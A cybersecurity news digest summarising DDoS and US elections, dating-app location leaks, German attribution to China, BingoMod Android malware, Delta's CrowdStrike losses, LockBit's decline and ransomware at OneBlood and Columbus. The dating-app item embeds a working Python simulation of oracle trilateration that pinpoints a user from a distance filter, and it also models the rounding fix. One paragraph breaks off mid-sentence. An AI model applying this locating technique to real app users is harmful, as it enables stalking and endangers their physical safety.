Cybersecurity News: Elections and DDoS, dating apps leak locations, Germany blames China

In today’s cybersecurity news…

DDoS attacks won’t impact US elections

CISA and the FBI issued a joint statement to this effect, saying that DDoS activity could at most make accessing election information temporarily more difficult. The statement said neither agency found any evidence of DDoS attacks affecting election results or preventing voters from casting ballots. They warned that any claims that DDoS attacks compromised the election will likely come from outside actors looking to undermine confidence in elections. The statement also recommended obtaining registration, polling, mail-in voting, and other information from official sources to avoid misinformation. 

(Bleeping Computer)

Dating apps leaked precise location data

A new paper from researchers at the Belgian university KU Leuven found that the dating apps Badoo, Bumble, Grindr, happn, Hinge, and Hily all shared the same design flaw, one that let someone pinpoint another user’s location to within 2 meters. Because these apps allowed exact distances to be used as a filter, the researchers used a technique called “oracle trilateration” to recover a target’s position: the filter acts as an oracle that answers only whether the target is inside a given range. A rough location derived from profile information was enough to start inside the range, and the filter then revealed the point at which the person was no longer in range. Doing this from three different locations gives three points at a known distance from the target, which is enough to determine their exact location. The researchers reached out to the app makers, who changed the filter behavior to make the approach much less effective, introducing uncertainty ranges from 111 meters to 1 kilometer. 
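The following is an added example, not code from the KU Leuven paper or the TechCrunch article, that simulates the flawed filter and the attack against it. It assumes the attacker can set the position the app believes they are at, a fixed 2 km range filter, and a target near Leuven; the coordinates and the rough starting guess are constructed values. The oracle class also models the mitigation: rounding the target’s coordinates to three decimal places (about 111 m of latitude) before the range check, which leaves the attacker with only the rounded grid point.

```python
"""Oracle trilateration against a "within R metres" filter (added example)."""
import math

EARTH_RADIUS_M = 6_371_000.0  # assumed mean Earth radius


def haversine_m(lat1, lon1, lat2, lon2):
    """Great-circle distance in metres between two points given in degrees."""
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dphi, dlam = p2 - p1, math.radians(lon2 - lon1)
    a = math.sin(dphi / 2) ** 2 + math.cos(p1) * math.cos(p2) * math.sin(dlam / 2) ** 2
    return 2 * EARTH_RADIUS_M * math.asin(math.sqrt(a))


class FilterOracle:
    """Stand-in for the app's distance filter: answers only "is the target
    within radius_m of the position you claim?". decimals=None reproduces
    the flaw (exact target position); decimals=3 models the mitigation of
    rounding the stored coordinates to 0.001 degrees before the check."""

    def __init__(self, target_lat, target_lon, decimals=None):
        if decimals is None:
            self._lat, self._lon = target_lat, target_lon
        else:
            self._lat, self._lon = round(target_lat, decimals), round(target_lon, decimals)
        self.queries = 0  # how many filter queries the attacker needed

    def in_range(self, lat, lon, radius_m):
        self.queries += 1
        return haversine_m(lat, lon, self._lat, self._lon) <= radius_m


def offset(lat, lon, bearing_deg, dist_m):
    """Destination point dist_m along bearing_deg (clockwise from north)."""
    phi, lam, th = math.radians(lat), math.radians(lon), math.radians(bearing_deg)
    d = dist_m / EARTH_RADIUS_M
    phi2 = math.asin(math.sin(phi) * math.cos(d) + math.cos(phi) * math.sin(d) * math.cos(th))
    lam2 = lam + math.atan2(math.sin(th) * math.sin(d) * math.cos(phi),
                            math.cos(d) - math.sin(phi) * math.sin(phi2))
    return math.degrees(phi2), math.degrees(lam2)


def find_boundary(oracle, lat, lon, bearing_deg, radius_m, max_walk_m=20_000, iters=50):
    """Walk from an in-range start along one bearing and bisect the walk
    distance until the oracle flips to "out of range". The returned point
    lies radius_m from the target, because the range check is exactly
    "distance <= radius_m" and the flip happens at that distance."""
    if not oracle.in_range(lat, lon, radius_m):
        raise ValueError("start point must be inside the filter range")
    if oracle.in_range(*offset(lat, lon, bearing_deg, max_walk_m), radius_m):
        raise ValueError("walk too short to leave the filter range")
    lo, hi = 0.0, float(max_walk_m)
    for _ in range(iters):
        mid = (lo + hi) / 2
        if oracle.in_range(*offset(lat, lon, bearing_deg, mid), radius_m):
            lo = mid
        else:
            hi = mid
    return offset(lat, lon, bearing_deg, hi)


def trilaterate(points, ref_lat, ref_lon):
    """Target = centre of the circle through three boundary points. Solved as
    a circumcentre in a local equirectangular plane (metres) around ref."""
    k = math.cos(math.radians(ref_lat))

    def to_xy(lat, lon):
        return (math.radians(lon - ref_lon) * k * EARTH_RADIUS_M,
                math.radians(lat - ref_lat) * EARTH_RADIUS_M)

    (ax, ay), (bx, by), (cx, cy) = (to_xy(*p) for p in points)
    d = 2 * (ax * (by - cy) + bx * (cy - ay) + cx * (ay - by))
    if abs(d) < 1e-9:
        raise ValueError("boundary points are collinear; choose other bearings")
    a2, b2, c2 = ax * ax + ay * ay, bx * bx + by * by, cx * cx + cy * cy
    ux = (a2 * (by - cy) + b2 * (cy - ay) + c2 * (ay - by)) / d
    uy = (a2 * (cx - bx) + b2 * (ax - cx) + c2 * (bx - ax)) / d
    return (ref_lat + math.degrees(uy / EARTH_RADIUS_M),
            ref_lon + math.degrees(ux / (k * EARTH_RADIUS_M)))


def locate(oracle, rough_lat, rough_lon, radius_m=2000.0, bearings=(0, 120, 240)):
    """Full attack: a rough guess inside the range plus three boundary searches."""
    pts = [find_boundary(oracle, rough_lat, rough_lon, b, radius_m) for b in bearings]
    return trilaterate(pts, rough_lat, rough_lon)


TARGET = (50.879123, 4.700456)  # constructed target position near Leuven
ROUGH = (50.8823, 4.6975)       # constructed rough guess, a few hundred metres off


def demo(decimals=None):
    """Returns (error of the recovered position in metres, oracle queries used)."""
    oracle = FilterOracle(*TARGET, decimals=decimals)
    est = locate(oracle, *ROUGH)
    return haversine_m(*est, *TARGET), oracle.queries


if __name__ == "__main__":
    err, q = demo()
    print(f"exact filter:   recovered target within {err:.2f} m using {q} queries")
    err, q = demo(decimals=3)
    print(f"rounded filter: recovered target within {err:.1f} m using {q} queries")
```

Against the exact filter the attack lands within a metre of the target after roughly 150 yes/no queries. Against the rounded filter the same attack still converges, but only onto the rounded grid point, so the remaining error is bounded by the rounding cell rather than by the attacker's patience; a coarser grid (1 km) widens that bound accordingly.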

(TechCrunch)

Germany formally blames China for 2021 cyberattack

The German government summoned the Chinese ambassador to lodge a complaint, formally accusing “Chinese state actors” of carrying out a cyberattack on its federal cartography agency. This marks the first time since 1989 that the German Foreign Ministry has summoned a Chinese ambassador for a protest. That last one was for Tiananmen Square, so it’s a big deal. According to the Foreign Ministry, its intelligence services provided reliable information showing Chinese involvement. This follows something of a crackdown on Chinese influence in the country. In the last few months, Germany announced plans to reduce the use of Huawei and ZTE network equipment in its 5G networks and arrested three people on suspicion of spying to export military technology. 

(Reuters)

BingoMod drains then wipes

Researchers at Cleafy documented a new, actively developed Android malware called BingoMod. It poses as various mobile security tools, with installs initially pushed through smishing campaigns. During installation, it asks for Accessibility service access. From there, it steals credentials, takes screenshots, and reroutes SMS messages. The operators perform on-device fraud with a VNC routine that “abuses Android’s Media Projection API to obtain real-time screen content,” which is then sent to its command servers. The researchers found instances of the operators stealing up to 15,000 euros per transaction. Once funds are stolen, BingoMod can also wipe the device to make forensics even more difficult. The 

(Bleeping Computer)

Huge thanks to our sponsor, Dropzone AI

Think of Alex, your new team member who never takes a break. Dropzone AI’s Analyst investigates every alert and delivers detailed reports without playbooks or code. Experience Alex’s dedication with a 3-month free trial at dropzone.ai.

Delta dishes on CrowdStrike damages

Just yesterday we mentioned that Delta Air Lines began lawyering up for legal action against CrowdStrike. In an update, Delta CEO Ed Bastian laid out the stakes on CNBC for any potential legal action, saying it cost the company $500 million in damages. This accounts for the lost revenue from the outage as well as compensation and hotels for stranded passengers. Delta canceled over 5,000 flights over a five-day period due to the outage, more than all cancelations in 2019. The outage also sparked an investigation by the US Department of Transportation. Bastian said the company has “no choice” but to seek damages from CrowdStrike.

(CNBC)

A look at LockBit today

The Register’s Connor Jones published a look at the current state of LockBit. The ransomware gang saw significant disruption from the UK NCA’s Operation Cronos in February. From its peak in November 2023, when it claimed attacks on 108 different organizations, the group listed fewer than 18 as of this June, according to data from Cyfirma. Its affiliates also fell from 194 at the time of the bust to 69, according to NCA investigators, who found that the remaining affiliates were “lower-level threat actors” attracted to the once potent LockBit brand. Investigators also saw mentions of LockBit on hacking forums fall off sharply. With the suspected LockBit leader now named as Russian national Dmitry Khoroshev, it’s unclear whether its current operators will attempt a rebrand like we’ve seen from other defunct ransomware groups. 

(The Register)

Ransomware hits blood donation center

The non-profit blood donation center OneBlood said a recent ransomware attack reduced its ability to collect blood and distribute it to hospitals across the Southeastern US. As a result, it asked over 250 hospitals to “activate their critical blood shortage protocols.” It said it also cannot process therapeutic donations. Local hospitals need O Positive, O Negative, and platelet donations to make up for the disruption. No word on who orchestrated the attack, but OneBlood is working with investigators to restore services. 

(Infosecurity Magazine)

Following up on Columbus ransomware outage

Last month we covered a ransomware attack against the Ohio capital, which disrupted many city services and municipal email. In an update, city investigators said an unnamed “established, sophisticated threat actor operating overseas” orchestrated the attack to disrupt its IT infrastructure and deploy ransomware. The city also began notifying people whose data was potentially exposed in the attack, although it did not outright confirm data exfiltration. The attackers gained access to municipal systems after an employee downloaded a malicious file, although the city said this was not through a phishing email. 

(Security Week)

Rich Stroffolino
Rich Stroffolino is a podcaster, editor, and writer based out of Cleveland, Ohio. Since 2015, he's worked in technology news podcasting and media. He dreams of someday writing the oral history of Transmeta.